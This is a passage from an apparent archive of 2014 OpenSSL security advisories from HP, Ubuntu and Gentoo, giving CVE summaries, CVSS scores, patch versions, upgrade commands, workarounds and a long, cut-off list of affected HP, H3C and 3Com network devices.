For Solaris http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00074
HP Connect IT / HP SPM CIT - 9.4x Please install: HP Connect IT 9.40.P1
For windows(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00075
For Linux(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00076
For AIX(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00077
For HPUX(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00078
For Solaris(en) http://support.openview.hp.com/selfsolve/document/LID/HPCIT_00079
HP Connect IT / HP SPM AM 5.2x Please install: HP Connect IT 9.41.P1
HISTORY Version:1 (rev.1) - 19 August 2014 Initial release
Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. ============================================================================ Ubuntu Security Notice USN-2232-3 June 23, 2014
openssl regression
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 LTS
- Ubuntu 13.10
- Ubuntu 12.04 LTS
- Ubuntu 10.04 LTS
Summary:
USN-2232-1 introduced a regression in OpenSSL. The upstream fix for CVE-2014-0224 caused a regression for certain applications that use renegotiation, such as PostgreSQL. This update fixes the problem.
Original advisory details:
J=C3=BCri Aedla discovered that OpenSSL incorrectly handled invalid DTLS fragments. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-0195) Imre Rad discovered that OpenSSL incorrectly handled DTLS recursions. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service. (CVE-2014-0221) KIKUCHI Masashi discovered that OpenSSL incorrectly handled certain handshakes. (CVE-2014-0224) Felix Gr=C3=B6bert and Ivan Fratri=C4=87 discovered that OpenSSL incorrectly handled anonymous ECDH ciphersuites. A remote attacker could use this issue to cause OpenSSL to crash, resulting in a denial of service. This issue only affected Ubuntu 12.04 LTS, Ubuntu 13.10, and Ubuntu 14.04 LTS. (CVE-2014-3470)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 LTS: libssl1.0.0 1.0.1f-1ubuntu2.4
Ubuntu 13.10: libssl1.0.0 1.0.1e-3ubuntu1.6
Ubuntu 12.04 LTS: libssl1.0.0 1.0.1-4ubuntu5.16
Ubuntu 10.04 LTS: libssl0.9.8 0.9.8k-7ubuntu8.19
After a standard system update you need to reboot your computer to make all the necessary changes.
References: http://www.ubuntu.com/usn/usn-2232-3 http://www.ubuntu.com/usn/usn-2232-1 https://launchpad.net/bugs/1332643
Package Information: https://launchpad.net/ubuntu/+source/openssl/1.0.1f-1ubuntu2.4 https://launchpad.net/ubuntu/+source/openssl/1.0.1e-3ubuntu1.6 https://launchpad.net/ubuntu/+source/openssl/1.0.1-4ubuntu5.16 https://launchpad.net/ubuntu/+source/openssl/0.9.8k-7ubuntu8.19 . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201407-05
http://security.gentoo.org/
Severity: High Title: OpenSSL: Multiple vulnerabilities Date: July 27, 2014 Bugs: #512506 ID: 201407-05
Synopsis
Multiple vulnerabilities have been found in OpenSSL, possibly allowing remote attackers to execute arbitrary code.
Affected packages
-------------------------------------------------------------------
Package / Vulnerable / Unaffected
-------------------------------------------------------------------
1 dev-libs/openssl < 1.0.1h-r1 >= 0.9.8z_p5 >= 0.9.8z_p4 >= 0.9.8z_p1 >= 0.9.8z_p3 >= 0.9.8z_p2 >= 1.0.0m >= 1.0.1h-r1
Description
Multiple vulnerabilities have been discovered in OpenSSL.
Workaround
There is no known workaround at this time.
Resolution
All OpenSSL users should upgrade to the latest version:
# emerge --sync # emerge --ask --oneshot --verbose ">=dev-libs/openssl-1.0.1h-r1"
References
[ 1 ] CVE-2010-5298 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2010-5298 [ 2 ] CVE-2014-0195 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0195 [ 3 ] CVE-2014-0198 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0198 [ 4 ] CVE-2014-0221 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0221 [ 5 ] CVE-2014-0224 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-0224 [ 6 ] CVE-2014-3470 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2014-3470 [ 7 ] OpenSSL Security Advisory [05 Jun 2014] http://www.openssl.org/news/secadv_20140605.txt
Availability
This GLSA and any updates to it are available for viewing at the Gentoo Security Website:
http://security.gentoo.org/glsa/glsa-201407-05.xml
Concerns?
Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org.
License
Copyright 2014 Gentoo Foundation, Inc; referenced text belongs to its owner(s).
The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license.
http://creativecommons.org/licenses/by-sa/2.5 . The bulletin does not apply to any other 3rd party application (e.g. operating system, web server, or application server) that may be required to be installed by the customer according instructions in the product install guide. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c04347622
SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c04347622 Version: 1
HPSBHF03052 rev.1 - HP Intelligent Management Center (iMC), HP Network Products including H3C and 3COM Routers and Switches running OpenSSL, Remote Denial of Service (DoS), Code Execution, Unauthorized Access, Modification or Disclosure of Information
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.
Release Date: 2014-06-20 Last Updated: 2014-06-20
Potential Security Impact: Remote Denial of Service (DoS), code execution, unauthorized access, modification of information, disclosure of information
Source: Hewlett-Packard Company, HP Software Security Response Team
VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Intelligent Management Center (iMC), HP Network Products including 3COM and H3C routers and switches running OpenSSL. The vulnerabilities could be exploited remotely to create a Denial of Service (DoS), execute code, allow unauthorized access, modify or disclose information.
References:
CVE-2010-5298 Remote Denial of Service (DoS) or Modification of Information CVE-2014-0198 Remote Unauthorized Access (only iMC impacted) CVE-2014-0224 Remote Unauthorized Access or Disclosure of Information SSRT101561 Note: All products listed are impacted by CVE-2014-0224 . iMC is also impacted by CVE-2014-0198 and CVE-2010-5298
SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. Please refer to the RESOLUTION section below for a list of impacted products.
BACKGROUND
CVSS 2.0 Base Metrics
Reference Base Vector Base Score CVE-2010-5298 (AV:N/AC:H/Au:N/C:N/I:P/A:P) 4.0 CVE-2014-0198 (AV:N/AC:M/Au:N/C:N/I:N/A:P) 4.3 CVE-2014-0224 (AV:N/AC:M/Au:N/C:P/I:P/A:P) 6.8 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002
RESOLUTION On June 5th 2014, OpenSSL.org issued an advisory with several CVE vulnerabilities. HP Networking is working to release fixes for these vulnerabilities that impact the products in the table below. As fixed software is made available, this security bulletin will be updated to show the fixed versions. Until the software fixes are available, HP Networking is providing the following information including possible workarounds to mitigate the risks of these vulnerabilities.
Description
The most serious issue reported is CVE-2014-0224 and it is the one discussed here. To take advantage CVE-2014-0224, an attacker must:
be in between the OpenSSL client and OpenSSL server. be capable of intercepting and modifying packets between the OpenSSL client and OpenSSL server in real time.
Workarounds
HP Networking equipment is typically deployed inside firewalls and access to management interfaces and other protocols is more tightly controlled than in public environments. This deployment and security restrictions help to reduce the possibility of an attacker being able to intercept both OpenSSL client and OpenSSL server traffic.
Following the guidelines in the Hardening Comware-based devices can help to further reduce man-in-the-middle opportunities:
http://h20564.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=c03536 920
For an HP Networking device acting as an OpenSSL Server, using a patched OpenSSL client or non-OpenSSL client eliminates the risk. As an example, most modern web browsers do not use the OpenSSL client and the sessions between the HP Networking OpenSSL server and the non-OpenSSL client are not at risk for this attack. For HP Networking Equipment that is using an OpenSSL client, patching the OpenSSL server will eliminate the risk of this attack.
Protocol Notes
The following details the protocols that use OpenSSL in Comware v5 and Comware v7:
Comware V7:
Server:
FIPS/HTTPS/Load Balancing/Session Initiation Protocol
Client:
Load Balancing/OpenFlow/Session Initiation Protocol/State Machine Based Anti-Spoofing/Dynamic DNS
Comware V5:
Server:
CAPWAP/EAP/SSLVPN
Client:
Dynamic DNS
Family Fixed Version HP Branded Products Impacted H3C Branded Products Impacted 3Com Branded Products Impacted
12900 Switch Series Fix in progress use mitigations JG619A HP FF 12910 Switch AC Chassis JG621A HP FF 12910 Main Processing Unit JG632A HP FF 12916 Switch AC Chassis JG634A HP FF 12916 Main Processing Unit
12500 Fix in progress use mitigations JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JC808A HP 12500 TAA Main Processing Unit H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M)
12500 (Comware v7) Fix in progress use mitigations JC085A HP A12518 Switch Chassis JC086A HP A12508 Switch Chassis JC652A HP 12508 DC Switch Chassis JC653A HP 12518 DC Switch Chassis JC654A HP 12504 AC Switch Chassis JC655A HP 12504 DC Switch Chassis JF430A HP A12518 Switch Chassis JF430B HP 12518 Switch Chassis JF430C HP 12518 AC Switch Chassis JF431A HP A12508 Switch Chassis JF431B HP 12508 Switch Chassis JF431C HP 12508 AC Switch Chassis JC072B HP 12500 Main Processing Unit JG497A HP 12500 MPU w/Comware V7 OS JG782A HP FF 12508E AC Switch Chassis JG783A HP FF 12508E DC Switch Chassis JG784A HP FF 12518E AC Switch Chassis JG785A HP FF 12518E DC Switch Chassis JG802A HP FF 12500E MPU H3C S12508 Routing Switch(AC-1) (0235A0GE) H3C S12518 Routing Switch(AC-1) (0235A0GF) H3C S12508 Chassis (0235A0E6) H3C S12508 Chassis (0235A38N) H3C S12518 Chassis (0235A0E7) H3C S12518 Chassis (0235A38M)
11900 Switch Series Fix in progress use mitigations JG608A HP FF 11908-V Switch Chassis JG609A HP FF 11900 Main Processing Unit
10500 Switch Series (Comware v5) Fix in progress use mitigations JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC614A HP 10500 Main Processing Unit JC748A HP 10512 Switch Chassis JG375A HP 10500 TAA Main Processing Unit JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis
10500 Switch Series (Comware v7) Fix in progress use mitigations JC611A HP 10508-V Switch Chassis JC612A HP 10508 Switch Chassis JC613A HP 10504 Switch Chassis JC748A HP 10512 Switch Chassis JG820A HP 10504 TAA Switch Chassis JG821A HP 10508 TAA Switch Chassis JG822A HP 10508-V TAA Switch Chassis JG823A HP 10512 TAA Switch Chassis JG496A HP 10500 Type A MPU w/Comware v7 OS
9500E Fix in progress use mitigations JC124A HP A9508 Switch Chassis JC124B HP 9505 Switch Chassis JC125A HP A9512 Switch Chassis JC125B HP 9512 Switch Chassis JC474A HP A9508-V Switch Chassis JC474B HP 9508-V Switch Chassis H3C S9505E Routing-Switch Chassis (0235A0G6) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9512E Routing-Switch Chassis (0235A0G7) H3C S9508E-V Routing-Switch Chassis (0235A38Q) H3C S9505E Chassis w/ Fans (0235A38P) H3C S9512E Chassis w/ Fans (0235A38R)
Router 8800 Fix in progress use mitigations JC147A HP A8802 Router Chassis JC147B HP 8802 Router Chassis JC148A HP A8805 Router Chassis JC148B HP 8805 Router Chassis JC149A HP A8808 Router Chassis JC149B HP 8808 Router Chassis JC150A HP A8812 Router Chassis JC150B HP 8812 Router Chassis JC141A HP 8802 Main Control Unit Module JC138A HP 8805/08/12 (1E) Main Cntrl Unit Mod JC137A HP 8805/08/12 (2E) Main Cntrl Unit Mod H3C SR8805 10G Core Router Chassis (0235A0G8) H3C SR8808 10G Core Router Chassis (0235A0G9) H3C SR8812 10G Core Router Chassis (0235A0GA) H3C SR8802 10G Core Router Chassis (0235A0GC) H3C SR8802 10G Core Router Chassis (0235A31B) H3C SR8805 10G Core Router Chassis (0235A31C) H3C SR8808 10G Core Router Chassis (0235A31D) H3C SR8812 10G Core Router Chassis (0235A31E)
7500 Switch Series Fix in progress use mitigations JC666A HP A7503-S 144 Gbps Fab/MPU w 24p Gig-T JC697A HP A7502 TAA Main Processing Unit JC698A HP A7503S 144 Gbps TAA Fab/MPU w 24p GbE JC699A HP A7500 384Gbps TAA Fab/MPU w 2p 10-GbE JC700A HP A7500 384 Gbps TAA Fabric / MPU JC701A HP A7510 768 Gbps TAA Fabric / MPU JD193A HP 384 Gbps A7500 Fab Mod w/2 XFP Ports JD193B HP 7500 384Gbps Fab Mod w/2 XFP Ports JD194A HP 384 Gbps Fabric A7500 Module JD194B HP 7500 384Gbps Fabric Module JD195A HP 7500 384Gbps Advanced Fabric Module JD196A HP 7502 Fabric Module JD220A HP 7500 768Gbps Fabric Module JD238A HP A7510 Switch Chassis JD238B HP 7510 Switch Chassis JD239A HP A7506 Switch Chassis JD239B HP 7506 Switch Chassis JD240A HP A7503 Switch Chassis JD240B HP 7503 Switch Chassis JD241A HP A7506 Vertical Switch Chassis JD241B HP 7506-V Switch Chassis JD242A HP A7502 Switch Chassis JD242B HP 7502 Switch Chassis JD243A HP A7503 Switch Chassis w/1 Fabric Slot JD243B HP 7503-S Switch Chassis w/1 Fabric Slot H3C S7502E Ethernet Switch Chassis with Fan (0235A0G4) H3C S7503E Ethernet Switch Chassis with Fan (0235A0G2) H3C S7503E-S Ethernet Switch Chassis with Fan (0235A0G5) H3C S7506E Ethernet Switch Chassis with Fan (0235A0G1) H3C S7506E-V Ethernet Switch Chassis with Fan (0235A0G3) H3C S7510E Ethernet Switch Chassis with Fan (0235A0G0) H3C S7502E Chassis w/ fans (0235A29A) H3C S7503E Chassis w/ fans (0235A27R) H3C S7503E-S Chassis w/ fans (0235A33R) H3C S7506E Chassis w/ fans (0235A27Q) H3C S7506E-V Chassis w/ fans (0235A27S)
HSR6800 Fix in progress use mitigations JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU
HSR6800 Russian Version Fix in progress use mitigations JG361A HP HSR6802 Router Chassis JG362A HP HSR6804 Router Chassis JG363A HP HSR6808 Router Chassis JG364A HP HSR6800 RSE-X2 Router MPU JG779A HP HSR6800 RSE-X2 Router TAA MPU
HSR6602 Fix in progress use mitigations JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router
HSR6602 Russian Version Fix in progress use mitigations JG353A HP HSR6602-G Router JG354A HP HSR6602-XG Router JG776A HP HSR6602-G TAA Router JG777A HP HSR6602-XG TAA Router
A6600 Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
A6600 Russian Version Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JC566A HP A6600 RSE-X1 Main Processing Unit JG780A HP 6600 RSE-X1 Router TAA MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
6600 MCP Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU. JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
6600 MCP Russian Version Fix in progress use mitigations JC177A HP 6608 Router JC177B HP A6608 Router Chassis JC178A HP 6604 Router Chassis JC178B HP A6604 Router Chassis JC496A HP 6616 Router Chassis JG778A HP 6600 MCP-X2 Router TAA MPU JG355A HP 6600 MCP-X1 Router MPU JG356A HP 6600 MCP-X2 Router MPU H3C RT-SR6608-OVS-H3 (0235A32X) H3C RT-SR6604-OVS-H3 (0235A37X) H3C SR6616 Router Chassis (0235A41D)
5920 Switch Series Fix in progress use mitigations JG296A HP 5920AF-24XG Switch JG555A HP 5920AF-24XG TAA Switch
5900 Switch Series Fix in progress use mitigations JC772A HP 5900AF-48XG-4QSFP+ Switch JG336A HP 5900AF-48XGT-4QSFP+ Switch JG510A HP 5900AF-48G-4XG-2QSFP+ Switch JG554A HP 5900AF-48XG-4QSFP+ TAA Switch JG838A HP FF 5900CP-48XG-4QSFP+ Switch
5900 Virtual Switch Fix in progress use mitigations JG814AAE HP Virtual Switch 5900v VMware E-LTU JG815AAE HP VSO SW for 5900v VMware E-LTU
5830 Switch Series Fix in progress use mitigations JC691A HP A5830AF-48G Switch w/1 Interface Slot JC694A HP A5830AF-96G Switch JG316A HP 5830AF-48G TAA Switch w/1 Intf Slot JG374A HP 5830AF-96G TAA Switch
5820 Switch Series Fix in progress use mitigations JC102A HP 5820-24XG-SFP+ Switch JC106A HP 5820-14XG-SFP+ Switch with 2 Slots JG219A HP 5820AF-24XG Switch JG243A HP 5820-24XG-SFP+ TAA-compliant Switch JG259A HP 5820X-14XG-SFP+ TAA Switch w 2 Slots H3C S5820X-28C 14 port (SFP Plus ) Plus 4-port BT (RJ45) Plus 2 media modules Plus OSM (0235A37L) H3C S5820X-28S 24-port 10GBASE-X (SFP Plus ) Plus 4-port 10/100/1000BASE-T (RJ45) (0235A370)
5800 Switch Series Fix in progress use mitigations JC099A HP 5800-24G-PoE Switch JC100A HP 5800-24G Switch JC101A HP 5800-48G Switch with 2 Slots JC103A HP 5800-24G-SFP Switch JC104A HP 5800-48G-PoE Switch JC105A HP 5800-48G Switch JG225A HP 5800AF-48G Switch JG242A HP 5800-48G-PoE+ TAA Switch w 2 Slots JG254A HP 5800-24G-PoE+ TAA-compliant Switch JG255A HP 5800-24G TAA-compliant Switch JG256A HP 5800-24G-SFP TAA Switch w 1 Intf Slt JG257A HP 5800-48G-PoE+ TAA Switch with 1 Slot JG258A HP 5800-48G TAA Switch w 1 Intf Slot H3C S5800-32C - 24-port 1BT Plus 4-port (SFP Plus ) Plus 1 media slot (0235A36U) H3C S5800-32C-PWR - 24-port 10/100/1000BASE-T (RJ45) Plus 4-port 10GBASE-X (SFP Plus ) Plus 1 media module PoE (0235A36S) H3C S5800-32F 24-port 1000BASE-X (SFP) Plus 4-port 10GBASE-X (SFP Plus ) Plus media module (no power) (0235A374) H3C S5800-56C 48-port 10/100/1000BASE-T (RJ45) Plus 4port 10GBASE-X (SFP Plus ) Plus media module (0235A379) H3C S5800-56C-PWR 48-port BT Plus 4 port (SFP Plus ) Plus media module (0235A378) H3C S5800-60C-PWR 48-port BT Plus 4-port SFP Plus 2 media modules Plus OSM (0235A36W)
5500 HI Switch Series Fix in progress use mitigations JG311A HP HI 5500-24G-4SFP w/2 Intf Slts Switch JG312A HP HI 5500-48G-4SFP w/2 Intf Slts Switch JG541A HP 5500-24G-PoE+-4SFP HI Switch w/2 Slt JG542A HP 5500-48G-PoE+-4SFP HI Switch w/2 Slt JG543A HP 5500-24G-SFP HI Switch w/2 Intf Slt JG679A HP 5500-24G-PoE+-4SFP HI TAA Swch w/2Slt JG680A HP 5500-48G-PoE+-4SFP HI TAA Swch w/2Slt JG681A HP 5500-24G-SFP HI TAA Swch w/2Slt
5500 EI Switch Series Fix in progress use mitigations JD373A HP 5500-24G DC EI Switch JD374A HP 5500-24G-SFP EI Switch JD375A HP 5500-48G EI Switch JD376A HP 5500-48G-PoE EI Switch JD377A HP 5500-24G EI Switch JD378A HP 5500-24G-PoE EI Switch JD379A HP 5500-24G-SFP DC EI Switch JG240A HP 5500-48G-PoE+ EI Switch w/2 Intf Slts JG241A HP 5500-24G-PoE+ EI Switch w/2 Intf Slts JG249A HP 5500-24G-SFP EI TAA Switch w 2 Slts JG250A HP 5500-24G EI TAA Switch w 2 Intf Slts JG251A HP 5500-48G EI TAA Switch w 2 Intf Slts JG252A HP 5500-24G-PoE+ EI TAA Switch w/2 Slts JG253A HP 5500-48G-PoE+ EI TAA Switch w/2 Slts H3C S5500-28C-EI Ethernet Switch (0235A253) H3C S5500-28F-EI Eth Switch AC Single (0235A24U) H3C S5500-52C-EI Ethernet Switch (0235A24X) H3C S5500-28C-EI-DC Ethernet Switch (0235A24S) H3C S5500-28C-PWR-EI Ethernet Switch (0235A255) H3C S5500-28F-EI Eth Swtch DC Single Pwr (0235A259) H3C S5500-52C-PWR-EI Ethernet Switch (0235A251)
5500 SI Switch Series Fix in progress use mitigations JD369A HP 5500-24G SI Switch JD370A HP 5500-48G SI Switch JD371A HP 5500-24G-PoE SI Switch JD372A HP 5500-48G-PoE SI Switch JG238A HP 5500-24G-PoE+ SI Switch w/2 Intf Slts JG239A HP 5500-48G-PoE+ SI Switch w/2 Intf Slts H3C S5500-28C-SI Ethernet Switch (0235A04U) H3C S5500-52C-SI Ethernet Switch (0235A04V) H3C S5500-28C-PWR-SI Ethernet Switch (0235A05H) H3C S5500-52C-PWR-SI Ethernet Switch (0235A05J)
5120 EI Switch Series Fix in progress use mitigations JE066A HP 5120-24G EI Switch JE067A HP 5120-48G EI Switch JE068A HP 5120-24G EI Switch with 2 Slots JE069A HP 5120-48G EI Switch with 2 Slots JE070A HP 5120-24G-PoE EI Switch with 2 Slots JE071A HP 5120-48G-PoE EI Switch with 2 Slots JG236A HP 5120-24G-PoE+ EI Switch w/2 Intf Slts JG237A HP 5120-48G-PoE+ EI Switch w/2 Intf Slts JG245A HP 5120-24G EI TAA Switch w 2 Intf Slts JG246A HP 5120-48G EI TAA Switch w 2 Intf Slts JG247A HP 5120-24G-PoE+ EI TAA Switch w 2 Slts JG248A HP 5120-48G-PoE+ EI TAA Switch w 2 Slts H3C S5120-24P-EI 24GE Plus 4ComboSFP (0235A0BQ) H3C S5120-28C-EI 24GE Plus 4Combo Plus 2Slt (0235A0BS) H3C S5120-48P-EI 48GE Plus 4ComboSFP (0235A0BR) H3C S5120-52C-EI 48GE Plus 4Combo Plus 2Slt (0235A0BT) H3C S5120-28C-PWR-EI 24G Plus 4C Plus 2S Plus POE (0235A0BU) H3C S5120-52C-PWR-EI 48G Plus 4C Plus 2S Plus POE (0235A0BV)
5120 SI switch Series Fix in progress use mitigations JE072A HP 5120-48G SI Switch JE073A HP 5120-16G SI Switch JE074A HP 5120-24G SI Switch JG091A HP 5120-24G-PoE+ (370W) SI Switch JG092A HP 5120-24G-PoE+ (170W) SI Switch H3C S5120-52P-SI 48GE Plus 4 SFP (0235A41W) H3C S5120-20P-SI L2 16GE Plus 4SFP (0235A42B) H3C S5120-28P-SI 24GE Plus 4 SFP (0235A42D) H3C S5120-28P-HPWR-SI (0235A0E5) H3C S5120-28P-PWR-SI (0235A0E3)
4800 G Switch Series Fix in progress use mitigations JD007A HP 4800-24G Switch JD008A HP 4800-24G-PoE Switch JD009A HP 4800-24G-SFP Switch JD010A HP 4800-48G Switch JD011A HP 4800-48G-PoE Switch
3Com Switch 4800G 24-Port (3CRS48G-24-91) 3Com Switch 4800G 24-Port SFP (3CRS48G-24S-91) 3Com Switch 4800G 48-Port (3CRS48G-48-91) 3Com Switch 4800G PWR 24-Port (3CRS48G-24P-91) 3Com Switch 4800G PWR 48-Port (3CRS48G-48P-91)
4510G Switch Series Fix in progress use mitigations JF428A HP 4510-48G Switch JF847A HP 4510-24G Switch
3Com Switch 4510G 48 Port (3CRS45G-48-91) 3Com Switch 4510G PWR 24-Port (3CRS45G-24P-91) 3Com Switch E4510-24G (3CRS45G-24-91)
4210G Switch Series Fix in progress use mitigations JF844A HP 4210-24G Switch JF845A HP 4210-48G Switch JF846A HP 4210-24G-PoE Switch
3Com Switch 4210-24G (3CRS42G-24-91) 3Com Switch 4210-48G (3CRS42G-48-91) 3Com Switch E4210-24G-PoE (3CRS42G-24P-91)
3610 Switch Series Fix in progress use mitigations JD335A HP 3610-48 Switch JD336A HP 3610-24-4G-SFP Switch JD337A HP 3610-24-2G-2G-SFP Switch JD338A HP 3610-24-SFP Switch H3C S3610-52P - model LS-3610-52P-OVS (0235A22C) H3C S3610-28P - model LS-3610-28P-OVS (0235A22D) H3C S3610-28TP - model LS-3610-28TP-OVS (0235A22E) H3C S3610-28F - model LS-3610-28F-OVS (0235A22F)
3600 V2 Switch Series Fix in progress use mitigations JG299A HP 3600-24 v2 EI Switch JG300A HP 3600-48 v2 EI Switch JG301A HP 3600-24-PoE+ v2 EI Switch JG301B HP 3600-24-PoE+ v2 EI Switch JG302A HP 3600-48-PoE+ v2 EI Switch JG302B HP 3600-48-PoE+ v2 EI Switch JG303A HP 3600-24-SFP v2 EI Switch JG304A HP 3600-24 v2 SI Switch JG305A HP 3600-48 v2 SI Switch JG306A HP 3600-24-PoE+ v2 SI Switch JG306B HP 3600-24-PoE+ v2 SI Switch JG307A HP 3600-48-PoE+ v2 SI Switch JG307B HP 3600-48-PoE+ v2 SI Switch
3100V2 Fix in progress use mitigations JD313B HP 3100-24-PoE v2 EI Switch JD318B HP 3100-8 v2 EI Switch JD319B HP 3100-16 v2 EI Switch JD320B HP 3100-24 v2 EI Switch JG221A HP 3100-8 v2 SI Switch JG222A HP 3100-16 v2 SI Switch JG223A HP 3100-24 v2 SI Switch
3100V2-48 Fix in progress use mitigations JG315A HP 3100-48 v2 Switch
1910 Fix in progress use mitigations JE005A HP 1910-16G Switch JE006A HP 1910-24G Switch JE007A HP 1910-24G-PoE (365W) Switch JE008A HP 1910-24G-PoE(170W) Switch JE009A HP 1910-48G Switch JG348A HP 1910-8G Switch JG349A HP 1910-8G-PoE+ (65W) Switch JG350A HP 1910-8G-PoE+ (180W) Switch 3Com Baseline Plus Switch 2900 Gigabit Family - 52 port (3CRBSG5293) 3Com Baseline Plus Switch 2900G - 20 port (3CRBSG2093) 3Com Baseline Plus Switch 2900G - 28 port (3CRBSG2893) 3Com Baseline Plus Switch 2900G - 28HPWR (3CRBSG28HPWR93) 3Com Baseline Plus Switch 2900G - 28PWR (3CRBSG28PWR93)
1810v1 P2 Fix in progress use mitigations J9449A HP 1810-8G Switch J9450A HP 1810-24G Switch
1810v1 PK Fix in progress use mitigations J9660A HP 1810-48G Switch
MSR20 Fix in progress use mitigations JD432A HP A-MSR20-21 Multi-Service Router JD662A HP MSR20-20 Multi-Service Router JD663A HP MSR20-21 Multi-Service Router JD663B HP MSR20-21 Router JD664A HP MSR20-40 Multi-Service Router JF228A HP MSR20-40 Router JF283A HP MSR20-20 Router H3C RT-MSR2020-AC-OVS-H3C (0235A324) H3C RT-MSR2040-AC-OVS-H3 (0235A326) H3C MSR 20-20 (0235A19H) H3C MSR 20-21 (0235A325) H3C MSR 20-40 (0235A19K) H3C MSR-20-21 Router (0235A19J)
MSR20-1X Fix in progress use mitigations JD431A HP MSR20-10 Router JD667A HP MSR20-15 IW Multi-Service Router JD668A HP MSR20-13 Multi-Service Router JD669A HP MSR20-13 W Multi-Service Router JD670A HP MSR20-15 A Multi-Service Router JD671A HP MSR20-15 AW Multi-Service Router JD672A HP MSR20-15 I Multi-Service Router JD673A HP MSR20-11 Multi-Service Router JD674A HP MSR20-12 Multi-Service Router JD675A HP MSR20-12 W Multi-Service Router JD676A HP MSR20-12 T1 Multi-Service Router JF236A HP MSR20-15-I Router JF237A HP MSR20-15-A Router JF238A HP MSR20-15-I-W Router JF239A HP MSR20-11 Router JF240A HP MSR20-13 Router JF241A HP MSR20-12 Router JF806A HP MSR20-12-T Router JF807A HP MSR20-12-W Router JF808A HP MSR20-13-W Router JF809A HP MSR20-15-A-W Router JF817A HP MSR20-15 Router JG209A HP MSR20-12-T-W Router (NA) JG210A HP MSR20-13-W Router (NA) H3C MSR 20-15 Router Host(AC) 1 FE 4 LSW 1 ADSLoPOTS 1 DSIC (0235A0A8) H3C MSR 20-10 (0235A0A7) H3C RT-MSR2011-AC-OVS-H3 (0235A395) H3C RT-MSR2012-AC-OVS-H3 (0235A396) H3C RT-MSR2012-AC-OVS-W-H3 (0235A397) H3C RT-MSR2012-T-AC-OVS-H3 (0235A398) H3C RT-MSR2013-AC-OVS-H3 (0235A390) H3C RT-MSR2013-AC-OVS-W-H3 (0235A391) H3C RT-MSR2015-AC-OVS-A-H3 (0235A392) H3C RT-MSR2015-AC-OVS-AW-H3 (0235A393) H3C RT-MSR2015-AC-OVS-I-H3 (0235A394) H3C RT-MSR2015-AC-OVS-IW-H3 (0235A38V) H3C MSR 20-11 (0235A31V) H3C MSR 20-12 (0235A32E) H3C MSR 20-12 T1 (0235A32B) H3C MSR 